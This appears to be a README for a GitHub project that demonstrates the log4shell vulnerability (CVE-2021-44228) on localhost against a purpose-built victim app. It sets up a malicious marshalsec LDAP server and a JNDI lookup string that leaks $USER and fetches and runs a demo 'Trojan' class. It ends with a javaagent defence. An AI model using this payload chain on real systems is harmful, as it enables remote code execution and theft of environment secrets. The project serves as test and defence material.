/log4shell-test-exploit

Test exploit of CVE-2021-44228

Primary LanguageJavaMIT LicenseMIT

Test exploit of CVE-2021-44228 (log4shell)

Preparation

# Install Nodejs HTTP server 
npm -g i http-server

# Build victim app
cd victim-app
mvn install

# Compile Trojan
cd test-trojan
javac Trojan.java

# Build marshalsec (required Java 8)
git clone git@github.com:mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests

# Build log4j-jndi-be-gone
git clone git@github.com:wajda/log4j-jndi-be-gone.git
cd log4j-jndi-be-gone
git checkout shading-support
./gradlew

Start the HTTP server hosting a Trojan payload

cd test-trojan
http-server .

Start a malicious LDAP server

See https://github.com/mbechler/marshalsec

cd marshalsec
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8080/#Trojan"

Watch for exploit events (optional)

useful in cases when stderr is hidden

watch -d -n 1 'ls -la /tmp/ | grep -i log4shell-BUSTED'

Exploit

Explanation

The victim application logs the following string via a vulnerable log4j2 library (version 2.14.1)

log.error("${jndi:ldap://127.0.0.1:1389/a/${env:USER}}");

executing two vectors of attacks simultaneously:

  1. Sniffing environment variables ($USER in this example), that can be viewed in the marshalsec LDAP server output
Send LDAP reference result for a/<VICTIM_USER_NAME> redirecting to http://127.0.0.1:8080/Trojan.class
  1. Download and execute malicious code that logs the message !!! BUSTED !!! to the victim's app standard error stream, as well as creates an empty /tmp/log4shell-BUSTED-* file.
    For this attack to work the following JVM option must be enabled on the victim server:
-Dcom.sun.jndi.ldap.object.trustURLCodebase=true
Execution
cd victim-app

# ... in a console app
java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

# ... in a web app (on Tomcat)
cp web/target/log4j2-victim-webapp-1.0-SNAPSHOT.war $TOMCAT_HOME/webapps
curl http://localhost:$TOMCAT_HTTP_PORT/log4j2-victim-webapp-1.0-SNAPSHOT/

Defence

See: https://github.com/wajda/log4j-jndi-be-gone/tree/shading-support

java -javaagent:log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=classSigDetection=enabled -jar fatjar/target/log4j2-victim-app-1.0-SNAPSHOT.jar

System-wide defence

Replace all java binaries with the script below:

java.guarded

#!/bin/bash
$(dirname "$0")/java.original "-javaagent:/path/to/log4j-jndi-be-gone-1.0.0-wajda-standalone.jar=logDir=/tmp,classSigDetection=enabled" "$@"

Example:

 cd $(dirname $(which java))
 sudo su
 mv java java.original
 cp java.guarded java